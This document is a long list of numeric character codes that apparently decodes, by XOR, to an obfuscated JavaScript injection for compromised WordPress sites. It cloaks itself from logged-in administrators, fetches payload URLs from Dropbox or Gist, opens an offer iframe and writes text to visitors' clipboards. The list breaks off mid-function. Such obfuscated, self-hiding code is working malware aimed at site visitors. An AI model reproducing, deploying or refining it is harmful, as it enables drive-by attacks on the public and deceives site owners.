2,122,122,122,51,60,40,59,55,63,27,46,46,40,96,122,120,62,59,46,59,119,51,52,54,51,52,63,119,53,60,60,63,40,119,60,40,59,55,63,120,118,87,80,122,122,122,122,50,51,52,46,41,96,122,33,39,118,87,80,122,122,122,122,40,47,52,10,40,53,55,51,41,63,96,122,52,47,54,54,118,87,80,122,122,122,122,62,63,41,46,40,53,35,96,122,52,47,54,54,118,87,80,122,122,122,122,40,63,44,63,59,54,96,122,52,47,54,54,118,87,80,122,122,122,122,40,63,43,47,63,41,46,14,51,55,63,53,47,46,23,41,96,122,110,106,106,106,118,87,80,122,122,122,122,51,60,40,59,55,63,14,51,55,63,53,47,46,23,41,96,122,99,106,106,106,118,87,80,122,122,122,122,40,63,43,47,51,40,63,8,63,59,62,35,23,63,41,41,59,61,63,96,122,60,59,54,41,63,118,87,80,122,122,122,122,55,63,41,41,59,61,63,24,53,47,52,62,96,122,60,59,54,41,63,87,80,122,122,39,97,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,51,41,13,42,22,53,61,61,63,62,19,52,25,53,52,46,63,34,46,114,115,122,33,87,80,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,51,60,122,114,45,51,52,62,53,45,116,5,5,62,51,41,59,56,54,63,19,52,54,51,52,63,21,60,60,63,40,5,5,122,103,103,103,122,46,40,47,63,122,38,38,122,45,51,52,62,53,45,116,5,5,51,41,13,42,27,62,55,51,52,5,5,122,103,103,103,122,46,40,47,63,115,122,40,63,46,47,40,52,122,46,40,47,63,97,87,80,87,80,122,122,122,122,122,122,44,59,40,122,42,59,46,50,122,103,122,45,51,52,62,53,45,116,54,53,57,59,46,51,53,52,116,42,59,46,50,52,59,55,63,122,38,38,122,120,120,97,87,80,122,122,122,122,122,122,51,60,122,114,117,4,6,117,114,45,42,119,59,62,55,51,52,38,45,42,119,54,53,61,51,52,115,117,116,46,63,41,46,114,42,59,46,50,115,115,122,40,63,46,47,40,52,122,46,40,47,63,97,87,80,87,80,122,122,122,122,122,122,44,59,40,122,57,53,53,49,51,63,122,103,122,62,53,57,47,55,63,52,46,116,57,53,53,49,51,63,122,38,38,122,120,120,97,87,80,122,122,122,122,122,122,51,60,122,114,117,45,53,40,62,42,40,63,41,41,5,54,53,61,61,63,62,5,51,52,5,1,4,103,7,112,103,117,116,46,63,41,46,114,57,53,53,49,51,63,115,115,122,40,63,46,47,40,52,122,46,40,47,63,97,87,80,87,80,122,122,122,122,122,122,44,59,40,122,62,63,122,103,122,62,53,57,47,55,63,52,46,116,62,53,57,47,55,63,52,46,31,54,63,55,63,52,46,97,87,80,122,122,122,122,122,122,44,59,40,122,56,53,62,35,122,103,122,62,53,57,47,55,63,52,46,116,56,53,62,35,97,87,80,87,80,122,122,122,122,122,122,51,60,122,114,62,63,122,124,124,122,46,35,42,63,53,60,122,62,63,116,57,54,59,41,41,20,59,55,63,122,103,103,103,122,120,41,46,40,51,52,61,120,122,124,124,122,117,6,56,45,42,119,46,53,53,54,56,59,40,6,56,117,116,46,63,41,46,114,62,63,116,57,54,59,41,41,20,59,55,63,115,115,122,40,63,46,47,40,52,122,46,40,47,63,97,87,80,122,122,122,122,122,122,51,60,122,114,56,53,62,35,122,124,124,122,46,35,42,63,53,60,122,56,53,62,35,116,57,54,59,41,41,20,59,55,63,122,103,103,103,122,120,41,46,40,51,52,61,120,122,124,124,122,117,6,56,59,62,55,51,52,119,56,59,40,6,56,117,116,46,63,41,46,114,56,53,62,35,116,57,54,59,41,41,20,59,55,63,115,115,122,40,63,46,47,40,52,122,46,40,47,63,97,87,80,122,122,122,122,122,122,51,60,122,114,62,53,57,47,55,63,52,46,116,61,63,46,31,54,63,55,63,52,46,24,35,19,62,114,120,45,42,59,62,55,51,52,56,59,40,120,115,115,122,40,63,46,47,40,52,122,46,40,47,63,97,87,80,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,87,80,122,122,122,122,40,63,46,47,40,52,122,60,59,54,41,63,97,87,80,122,122,39,87,80,87,80,122,122,51,60,122,114,51,41,13,42,22,53,61,61,63,62,19,52,25,53,52,46,63,34,46,114,115,115,122,40,63,46,47,40,52,97,87,80,87,80,122,122,51,60,122,114,62,53,57,47,55,63,52,46,116,61,63,46,31,54,63,55,63,52,46,24,35,19,62,114,40,63,61,51,41,46,40,35,116,51,60,40,59,55,63,19,62,115,115,122,33,87,80,122,122,122,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,122,120,59,57,46,51,44,63,120,97,87,80,122,122,122,122,40,63,46,47,40,52,97,87,80,122,122,39,87,80,87,80,122,122,51,60,122,114,40,63,61,51,41,46,40,35,116,40,47,52,10,40,53,55,51,41,63,122,38,38,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,103,103,122,120,54,53,59,62,51,52,61,120,122,38,38,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,103,103,122,120,59,57,46,51,44,63,120,122,38,38,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,103,103,122,120,62,53,52,63,120,115,122,33,87,80,122,122,122,122,40,63,46,47,40,52,97,87,80,122,122,39,87,80,87,80,122,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,122,120,54,53,59,62,51,52,61,120,97,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,41,59,60,63,27,42,42,63,52,62,11,47,63,40,35,114,47,40,54,118,122,49,63,35,118,122,44,59,54,115,122,33,87,80,122,122,122,122,44,59,40,122,41,63,42,122,103,122,47,40,54,116,51,52,62,63,34,21,60,114,120,101,120,115,122,100,103,122,106,122,101,122,120,124,120,122,96,122,120,101,120,97,87,80,122,122,122,122,40,63,46,47,40,52,122,47,40,54,122,113,122,41,63,42,122,113,122,63,52,57,53,62,63,15,8,19,25,53,55,42,53,52,63,52,46,114,49,63,35,115,122,113,122,120,103,120,122,113,122,63,52,57,53,62,63,15,8,19,25,53,55,42,53,52,63,52,46,114,44,59,54,115,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,56,47,51,54,62,14,40,47,41,46,63,62,15,40,54,114,46,63,55,42,54,59,46,63,118,122,51,62,115,122,33,87,80,122,122,122,122,51,60,122,114,123,46,63,55,42,54,59,46,63,122,38,38,122,123,51,62,115,122,40,63,46,47,40,52,122,120,120,97,87,80,87,80,122,122,122,122,51,60,122,114,46,63,55,42,54,59,46,63,116,51,52,62,63,34,21,60,114,120,62,40,53,42,56,53,34,116,57,53,55,120,115,122,100,103,122,106,115,122,33,87,80,122,122,122,122,122,122,40,63,46,47,40,52,122,46,63,55,42,54,59,46,63,116,40,63,42,54,59,57,63,114,117,6,33,51,62,6,39,117,61,118,122,51,62,115,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,44,59,40,122,63,52,57,53,62,63,62,122,103,122,63,52,57,53,62,63,15,8,19,25,53,55,42,53,52,63,52,46,114,51,62,115,97,87,80,87,80,122,122,122,122,51,60,122,114,46,63,55,42,54,59,46,63,116,51,52,62,63,34,21,60,114,120,61,51,41,46,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,120,115,122,100,103,122,106,115,122,33,87,80,122,122,122,122,122,122,63,52,57,53,62,63,62,122,103,122,63,52,57,53,62,63,62,116,40,63,42,54,59,57,63,114,117,127,104,28,117,61,118,122,120,117,120,115,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,40,63,46,47,40,52,122,46,63,55,42,54,59,46,63,116,40,63,42,54,59,57,63,114,117,6,33,51,62,6,39,117,61,118,122,63,52,57,53,62,63,62,115,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,46,53,18,46,46,42,15,40,54,114,44,59,54,47,63,115,122,33,87,80,122,122,122,122,51,60,122,114,123,44,59,54,47,63,115,122,40,63,46,47,40,52,122,120,120,97,87,80,87,80,122,122,122,122,44,59,40,122,41,122,103,122,9,46,40,51,52,61,114,44,59,54,47,63,115,87,80,122,122,122,122,122,122,116,40,63,42,54,59,57,63,114,117,4,6,47,28,31,28,28,117,118,122,120,120,115,87,80,122,122,122,122,122,122,116,46,40,51,55,114,115,87,80,122,122,122,122,122,122,116,40,63,42,54,59,57,63,114,117,4,1,125,120,58,6,41,7,113,38,1,125,120,58,6,41,7,113,126,117,61,118,122,120,120,115,97,87,80,87,80,122,122,122,122,51,60,122,114,123,41,115,122,40,63,46,47,40,52,122,120,120,97,87,80,87,80,122,122,122,122,51,60,122,114,123,117,4,1,59,119,32,7,1,59,119,32,106,119,99,113,116,119,7,112,96,6,117,6,117,117,51,116,46,63,41,46,114,41,115,115,122,33,87,80,122,122,122,122,122,122,51,60,122,114,117,4,1,59,119,32,106,119,99,116,119,7,113,6,116,1,59,119,32,7,33,104,118,39,114,101,96,96,6,62,113,115,101,114,101,96,1,6,117,101,121,7,38,126,115,117,51,116,46,63,41,46,114,41,115,115,122,33,87,80,122,122,122,122,122,122,122,122,41,122,103,122,120,50,46,46,42,41,96,117,117,120,122,113,122,41,97,87,80,122,122,122,122,122,122,39,122,63,54,41,63,122,33,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,122,122,122,122,39,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,44,59,40,122,47,122,103,122,52,63,45,122,15,8,22,114,41,115,97,87,80,122,122,122,122,122,122,51,60,122,114,47,116,42,40,53,46,53,57,53,54,122,103,103,103,122,120,50,46,46,42,96,120,122,38,38,122,47,116,42,40,53,46,53,57,53,54,122,103,103,103,122,120,50,46,46,42,41,96,120,115,122,33,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,47,116,50,40,63,60,97,87,80,122,122,122,122,122,122,39,87,80,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,87,80,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,60,51,52,62,15,40,54,19,52,21,56,48,63,57,46,114,51,52,42,47,46,118,122,62,63,42,46,50,115,122,33,87,80,122,122,122,122,51,60,122,114,123,51,52,42,47,46,122,38,38,122,62,63,42,46,50,122,100,122,105,115,122,40,63,46,47,40,52,122,120,120,97,87,80,87,80,122,122,122,122,51,60,122,114,46,35,42,63,53,60,122,51,52,42,47,46,122,103,103,103,122,120,41,46,40,51,52,61,120,115,122,33,87,80,122,122,122,122,122,122,40,63,46,47,40,52,122,46,53,18,46,46,42,15,40,54,114,51,52,42,47,46,115,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,51,60,122,114,21,56,48,63,57,46,116,42,40,53,46,53,46,35,42,63,116,46,53,9,46,40,51,52,61,116,57,59,54,54,114,51,52,42,47,46,115,122,103,103,103,122,120,1,53,56,48,63,57,46,122,27,40,40,59,35,7,120,115,122,33,87,80,122,122,122,122,122,122,60,53,40,122,114,44,59,40,122,51,122,103,122,106,97,122,51,122,102,122,51,52,42,47,46,116,54,63,52,61,46,50,97,122,51,113,113,115,122,33,87,80,122,122,122,122,122,122,122,122,44,59,40,122,59,40,40,12,59,54,122,103,122,60,51,52,62,15,40,54,19,52,21,56,48,63,57,46,114,51,52,42,47,46,1,51,7,118,122,62,63,42,46,50,122,113,122,107,115,97,87,80,122,122,122,122,122,122,122,122,51,60,122,114,59,40,40,12,59,54,115,122,40,63,46,47,40,52,122,59,40,40,12,59,54,97,87,80,122,122,122,122,122,122,39,87,80,122,122,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,51,60,122,114,46,35,42,63,53,60,122,51,52,42,47,46,122,103,103,103,122,120,53,56,48,63,57,46,120,115,122,33,87,80,122,122,122,122,122,122,44,59,40,122,49,63,35,41,122,103,122,1,120,47,40,54,120,118,122,120,54,51,52,49,120,118,122,120,50,40,63,60,120,118,122,120,54,53,57,59,46,51,53,52,120,118,122,120,40,63,62,51,40,63,57,46,120,118,122,120,46,59,40,61,63,46,120,118,122,120,54,59,52,62,51,52,61,120,118,122,120,54,59,52,62,51,52,61,15,40,54,120,7,97,87,80,87,80,122,122,122,122,122,122,60,53,40,122,114,44,59,40,122,48,122,103,122,106,97,122,48,122,102,122,49,63,35,41,116,54,63,52,61,46,50,97,122,48,113,113,115,122,33,87,80,122,122,122,122,122,122,122,122,44,59,40,122,49,63,35,122,103,122,49,63,35,41,1,48,7,97,87,80,122,122,122,122,122,122,122,122,51,60,122,114,21,56,48,63,57,46,116,42,40,53,46,53,46,35,42,63,116,50,59,41,21,45,52,10,40,53,42,63,40,46,35,116,57,59,54,54,114,51,52,42,47,46,118,122,49,63,35,115,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,44,59,40,122,62,51,40,63,57,46,122,103,122,60,51,52,62,15,40,54,19,52,21,56,48,63,57,46,114,51,52,42,47,46,1,49,63,35,7,118,122,62,63,42,46,50,122,113,122,107,115,97,87,80,122,122,122,122,122,122,122,122,122,122,51,60,122,114,62,51,40,63,57,46,115,122,40,63,46,47,40,52,122,62,51,40,63,57,46,97,87,80,122,122,122,122,122,122,122,122,39,87,80,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,60,53,40,122,114,44,59,40,122,49,122,51,52,122,51,52,42,47,46,115,122,33,87,80,122,122,122,122,122,122,122,122,51,60,122,114,123,21,56,48,63,57,46,116,42,40,53,46,53,46,35,42,63,116,50,59,41,21,45,52,10,40,53,42,63,40,46,35,116,57,59,54,54,114,51,52,42,47,46,118,122,49,115,115,122,57,53,52,46,51,52,47,63,97,87,80,122,122,122,122,122,122,122,122,44,59,40,122,52,63,41,46,63,62,122,103,122,60,51,52,62,15,40,54,19,52,21,56,48,63,57,46,114,51,52,42,47,46,1,49,7,118,122,62,63,42,46,50,122,113,122,107,115,97,87,80,122,122,122,122,122,122,122,122,51,60,122,114,52,63,41,46,63,62,115,122,40,63,46,47,40,52,122,52,63,41,46,63,62,97,87,80,122,122,122,122,122,122,39,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,63,34,46,40,59,57,46,22,59,52,62,51,52,61,15,40,54,114,40,59,45,115,122,33,87,80,122,122,122,122,51,60,122,114,123,40,59,45,115,122,40,63,46,47,40,52,122,120,120,97,87,80,87,80,122,122,122,122,44,59,40,122,46,63,34,46,122,103,122,9,46,40,51,52,61,114,40,59,45,115,116,40,63,42,54,59,57,63,114,117,4,6,47,28,31,28,28,117,118,122,120,120,115,116,46,40,51,55,114,115,97,87,80,122,122,122,122,51,60,122,114,123,46,63,34,46,115,122,40,63,46,47,40,52,122,120,120,97,87,80,87,80,122,122,122,122,44,59,40,122,62,51,40,63,57,46,122,103,122,46,53,18,46,46,42,15,40,54,114,46,63,34,46,115,97,87,80,122,122,122,122,51,60,122,114,62,51,40,63,57,46,115,122,40,63,46,47,40,52,122,62,51,40,63,57,46,97,87,80,87,80,122,122,122,122,51,60,122,114,114,46,63,34,46,116,57,50,59,40,27,46,114,106,115,122,103,103,103,122,120,33,120,122,124,124,122,46,63,34,46,116,57,50,59,40,27,46,114,46,63,34,46,116,54,63,52,61,46,50,122,119,122,107,115,122,103,103,103,122,120,39,120,115,122,38,38,87,80,122,122,122,122,122,122,122,122,114,46,63,34,46,116,57,50,59,40,27,46,114,106,115,122,103,103,103,122,120,1,120,122,124,124,122,46,63,34,46,116,57,50,59,40,27,46,114,46,63,34,46,116,54,63,52,61,46,50,122,119,122,107,115,122,103,103,103,122,120,7,120,115,115,122,33,87,80,122,122,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,122,122,44,59,40,122,42,59,40,41,63,62,122,103,122,16,9,21,20,116,42,59,40,41,63,114,46,63,34,46,115,97,87,80,122,122,122,122,122,122,122,122,44,59,40,122,48,41,53,52,15,40,54,122,103,122,60,51,52,62,15,40,54,19,52,21,56,48,63,57,46,114,42,59,40,41,63,62,118,122,106,115,97,87,80,122,122,122,122,122,122,122,122,51,60,122,114,48,41,53,52,15,40,54,115,122,40,63,46,47,40,52,122,48,41,53,52,15,40,54,97,87,80,122,122,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,44,59,40,122,55,59,46,57,50,18,46,46,42,122,103,122,46,63,34,46,116,55,59,46,57,50,114,117,50,46,46,42,41,101,96,6,117,6,117,1,4,6,41,120,125,102,100,7,113,117,51,115,97,87,80,122,122,122,122,51,60,122,114,55,59,46,57,50,18,46,46,42,122,124,124,122,55,59,46,57,50,18,46,46,42,1,106,7,115,122,33,87,80,122,122,122,122,122,122,44,59,40,122,50,46,46,42,15,40,54,122,103,122,46,53,18,46,46,42,15,40,54,114,55,59,46,57,50,18,46,46,42,1,106,7,115,97,87,80,122,122,122,122,122,122,51,60,122,114,50,46,46,42,15,40,54,115,122,40,63,46,47,40,52,122,50,46,46,42,15,40,54,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,44,59,40,122,55,59,46,57,50,30,53,55,59,51,52,122,103,122,46,63,34,46,116,55,59,46,57,50,114,117,6,56,1,59,119,32,106,119,99,116,119,7,113,6,116,1,59,119,32,7,33,104,118,39,114,101,96,96,6,62,113,115,101,114,101,96,6,117,1,4,6,41,120,125,102,100,7,112,115,101,117,51,115,97,87,80,122,122,122,122,51,60,122,114,55,59,46,57,50,30,53,55,59,51,52,122,124,124,122,55,59,46,57,50,30,53,55,59,51,52,1,106,7,115,122,33,87,80,122,122,122,122,122,122,44,59,40,122,62,53,55,59,51,52,15,40,54,122,103,122,46,53,18,46,46,42,15,40,54,114,55,59,46,57,50,30,53,55,59,51,52,1,106,7,115,97,87,80,122,122,122,122,122,122,51,60,122,114,62,53,55,59,51,52,15,40,54,115,122,40,63,46,47,40,52,122,62,53,55,59,51,52,15,40,54,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,61,63,46,21,40,51,61,51,52,9,59,60,63,114,47,40,54,115,122,33,87,80,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,40,63,46,47,40,52,122,52,63,45,122,15,8,22,114,47,40,54,115,116,53,40,51,61,51,52,97,87,80,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,87,80,122,122,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,122,122,39,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,59,62,62,18,51,52,46,114,40,63,54,118,122,50,40,63,60,115,122,33,87,80,122,122,122,122,51,60,122,114,123,50,40,63,60,122,38,38,122,123,62,53,57,47,55,63,52,46,122,38,38,122,123,62,53,57,47,55,63,52,46,116,57,40,63,59,46,63,31,54,63,55,63,52,46,115,122,40,63,46,47,40,52,97,87,80,87,80,122,122,122,122,44,59,40,122,49,63,35,122,103,122,40,63,54,122,113,122,120,96,96,120,122,113,122,50,40,63,60,97,87,80,122,122,122,122,51,60,122,114,40,63,61,51,41,46,40,35,116,50,51,52,46,41,1,49,63,35,7,115,122,40,63,46,47,40,52,97,87,80,122,122,122,122,40,63,61,51,41,46,40,35,116,50,51,52,46,41,1,49,63,35,7,122,103,122,46,40,47,63,97,87,80,87,80,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,44,59,40,122,42,59,40,63,52,46,122,103,122,62,53,57,47,55,63,52,46,116,50,63,59,62,122,38,38,122,62,53,57,47,55,63,52,46,116,62,53,57,47,55,63,52,46,31,54,63,55,63,52,46,97,87,80,122,122,122,122,122,122,51,60,122,114,123,42,59,40,63,52,46,115,122,40,63,46,47,40,52,97,87,80,87,80,122,122,122,122,122,122,44,59,40,122,54,51,52,49,122,103,122,62,53,57,47,55,63,52,46,116,57,40,63,59,46,63,31,54,63,55,63,52,46,114,120,54,51,52,49,120,115,97,87,80,122,122,122,122,122,122,54,51,52,49,116,40,63,54,122,103,122,40,63,54,97,87,80,122,122,122,122,122,122,54,51,52,49,116,50,40,63,60,122,103,122,50,40,63,60,97,87,80,87,80,122,122,122,122,122,122,51,60,122,114,40,63,54,122,103,103,103,122,120,42,40,63,57,53,52,52,63,57,46,120,115,122,33,87,80,122,122,122,122,122,122,122,122,54,51,52,49,116,57,40,53,41,41,21,40,51,61,51,52,122,103,122,120,59,52,53,52,35,55,53,47,41,120,97,87,80,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,42,59,40,63,52,46,116,59,42,42,63,52,62,25,50,51,54,62,114,54,51,52,49,115,97,87,80,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,45,59,40,55,47,42,21,40,51,61,51,52,41,114,115,122,33,87,80,122,122,122,122,44,59,40,122,53,40,51,61,51,52,41,122,103,122,33,39,97,87,80,122,122,122,122,44,59,40,122,59,42,51,21,40,51,61,51,52,122,103,122,61,63,46,21,40,51,61,51,52,9,59,60,63,114,27,10,19,5,19,30,5,15,8,22,115,97,87,80,122,122,122,122,51,60,122,114,59,42,51,21,40,51,61,51,52,115,122,53,40,51,61,51,52,41,1,59,42,51,21,40,51,61,51,52,7,122,103,122,46,40,47,63,97,87,80,87,80,122,122,122,122,60,53,40,122,114,44,59,40,122,51,122,103,122,106,97,122,51,122,102,122,14,8,15,9,14,31,30,5,25,21,20,28,19,29,9,116,54,63,52,61,46,50,97,122,51,113,113,115,122,33,87,80,122,122,122,122,122,122,44,59,40,122,46,42,54,122,103,122,14,8,15,9,14,31,30,5,25,21,20,28,19,29,9,1,51,7,122,124,124,122,14,8,15,9,14,31,30,5,25,21,20,28,19,29,9,1,51,7,116,46,63,55,42,54,59,46,63,97,87,80,122,122,122,122,122,122,51,60,122,114,123,46,42,54,115,122,57,53,52,46,51,52,47,63,97,87,80,122,122,122,122,122,122,44,59,40,122,42,40,53,56,63,122,103,122,46,42,54,116,40,63,42,54,59,57,63,114,117,6,33,51,62,6,39,117,61,118,122,120,34,120,115,97,87,80,122,122,122,122,122,122,44,59,40,122,53,40,51,61,51,52,122,103,122,61,63,46,21,40,51,61,51,52,9,59,60,63,114,42,40,53,56,63,115,97,87,80,122,122,122,122,122,122,51,60,122,114,53,40,51,61,51,52,115,122,53,40,51,61,51,52,41,1,53,40,51,61,51,52,7,122,103,122,46,40,47,63,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,60,53,40,122,114,44,59,40,122,53,40,51,61,51,52,17,63,35,122,51,52,122,53,40,51,61,51,52,41,115,122,33,87,80,122,122,122,122,122,122,51,60,122,114,123,21,56,48,63,57,46,116,42,40,53,46,53,46,35,42,63,116,50,59,41,21,45,52,10,40,53,42,63,40,46,35,116,57,59,54,54,114,53,40,51,61,51,52,41,118,122,53,40,51,61,51,52,17,63,35,115,115,122,57,53,52,46,51,52,47,63,97,87,80,122,122,122,122,122,122,59,62,62,18,51,52,46,114,120,62,52,41,119,42,40,63,60,63,46,57,50,120,118,122,53,40,51,61,51,52,17,63,35,115,97,87,80,122,122,122,122,122,122,59,62,62,18,51,52,46,114,120,42,40,63,57,53,52,52,63,57,46,120,118,122,53,40,51,61,51,52,17,63,35,115,97,87,80,122,122,122,122,39,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,61,63,46,23,53,47,52,46,20,53,62,63,114,115,122,33,87,80,122,122,122,122,40,63,46,47,40,52,122,62,53,57,47,55,63,52,46,116,56,53,62,35,122,38,38,122,62,53,57,47,55,63,52,46,116,62,53,57,47,55,63,52,46,31,54,63,55,63,52,46,122,38,38,122,52,47,54,54,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,60,63,46,57,50,14,63,34,46,20,53,14,50,40,53,45,114,47,40,54,118,122,46,51,55,63,53,47,46,23,41,115,122,33,87,80,122,122,122,122,40,63,46,47,40,52,122,52,63,45,122,10,40,53,55,51,41,63,114,60,47,52,57,46,51,53,52,122,114,40,63,41,53,54,44,63,115,122,33,87,80,122,122,122,122,122,122,51,60,122,114,123,47,40,54,122,38,38,122,46,35,42,63,53,60,122,60,63,46,57,50,122,123,103,103,122,120,60,47,52,57,46,51,53,52,120,115,122,33,87,80,122,122,122,122,122,122,122,122,40,63,41,53,54,44,63,114,120,120,115,97,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,97,87,80,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,44,59,40,122,60,51,52,51,41,50,63,62,122,103,122,60,59,54,41,63,97,87,80,122,122,122,122,122,122,44,59,40,122,46,51,55,63,40,122,103,122,52,47,54,54,97,87,80,122,122,122,122,122,122,44,59,40,122,57,53,52,46,40,53,54,54,63,40,122,103,122,52,47,54,54,97,87,80,87,80,122,122,122,122,122,122,60,47,52,57,46,51,53,52,122,62,53,52,63,114,44,59,54,47,63,115,122,33,87,80,122,122,122,122,122,122,122,122,51,60,122,114,60,51,52,51,41,50,63,62,115,122,40,63,46,47,40,52,97,87,80,122,122,122,122,122,122,122,122,60,51,52,51,41,50,63,62,122,103,122,46,40,47,63,97,87,80,122,122,122,122,122,122,122,122,51,60,122,114,46,51,55,63,40,115,122,57,54,63,59,40,14,51,55,63,53,47,46,114,46,51,55,63,40,115,97,87,80,122,122,122,122,122,122,122,122,40,63,41,53,54,44,63,114,114,44,59,54,47,63,122,38,38,122,120,120,115,116,46,40,51,55,114,115,115,97,87,80,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,122,122,51,60,122,114,46,35,42,63,53,60,122,27,56,53,40,46,25,53,52,46,40,53,54,54,63,40,122,123,103,103,122,120,47,52,62,63,60,51,52,63,62,120,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,57,53,52,46,40,53,54,54,63,40,122,103,122,52,63,45,122,27,56,53,40,46,25,53,52,46,40,53,54,54,63,40,114,115,97,87,80,122,122,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,122,122,46,51,55,63,40,122,103,122,41,63,46,14,51,55,63,53,47,46,114,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,122,122,122,122,122,122,51,60,122,114,57,53,52,46,40,53,54,54,63,40,115,122,57,53,52,46,40,53,54,54,63,40,116,59,56,53,40,46,114,115,97,87,80,122,122,122,122,122,122,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,122,122,122,122,122,122,122,122,122,122,62,53,52,63,114,120,120,115,97,87,80,122,122,122,122,122,122,122,122,39,118,122,46,51,55,63,53,47,46,23,41,115,97,87,80,87,80,122,122,122,122,122,122,122,122,60,63,46,57,50,114,47,40,54,118,122,33,87,80,122,122,122,122,122,122,122,122,122,122,57,59,57,50,63,96,122,120,52,53,119,41,46,53,40,63,120,118,87,80,122,122,122,122,122,122,122,122,122,122,57,40,63,62,63,52,46,51,59,54,41,96,122,120,53,55,51,46,120,118,87,80,122,122,122,122,122,122,122,122,122,122,41,51,61,52,59,54,96,122,57,53,52,46,40,53,54,54,63,40,122,101,122,57,53,52,46,40,53,54,54,63,40,116,41,51,61,52,59,54,122,96,122,44,53,51,62,122,106,87,80,122,122,122,122,122,122,122,122,39,115,87,80,122,122,122,122,122,122,122,122,122,122,116,46,50,63,52,114,60,47,52,57,46,51,53,52,122,114,40,63,41,42,53,52,41,63,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,40,63,41,42,53,52,41,63,122,101,122,40,63,41,42,53,52,41,63,116,46,63,34,46,114,115,122,96,122,120,120,97,87,80,122,122,122,122,122,122,122,122,122,122,39,115,87,80,122,122,122,122,122,122,122,122,122,122,116,46,50,63,52,114,60,47,52,57,46,51,53,52,122,114,46,63,34,46,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,122,122,62,53,52,63,114,46,63,34,46,115,97,87,80,122,122,122,122,122,122,122,122,122,122,39,115,87,80,122,122,122,122,122,122,122,122,122,122,116,57,59,46,57,50,114,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,122,122,62,53,52,63,114,120,120,115,97,87,80,122,122,122,122,122,122,122,122,122,122,39,115,97,87,80,122,122,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,87,80,122,122,122,122,122,122,122,122,62,53,52,63,114,120,120,115,97,87,80,122,122,122,122,122,122,39,87,80,122,122,122,122,39,115,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,46,40,35,25,53,42,35,114,46,63,34,46,115,122,33,87,80,122,122,122,122,51,60,122,114,46,35,42,63,53,60,122,46,63,34,46,122,123,103,103,122,120,41,46,40,51,52,61,120,122,38,38,122,123,46,63,34,46,115,122,40,63,46,47,40,52,97,87,80,87,80,122,122,122,122,46,40,35,122,33,122,45,51,52,62,53,45,116,60,53,57,47,41,114,115,97,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,87,80,122,122,122,122,51,60,122,114,52,59,44,51,61,59,46,53,40,116,57,54,51,42,56,53,59,40,62,122,124,124,122,52,59,44,51,61,59,46,53,40,116,57,54,51,42,56,53,59,40,62,116,45,40,51,46,63,14,63,34,46,115,122,33,87,80,122,122,122,122,122,122,52,59,44,51,61,59,46,53,40,116,57,54,51,42,56,53,59,40,62,116,45,40,51,46,63,14,63,34,46,114,46,63,34,46,115,116,57,59,46,57,50,114,60,47,52,57,46,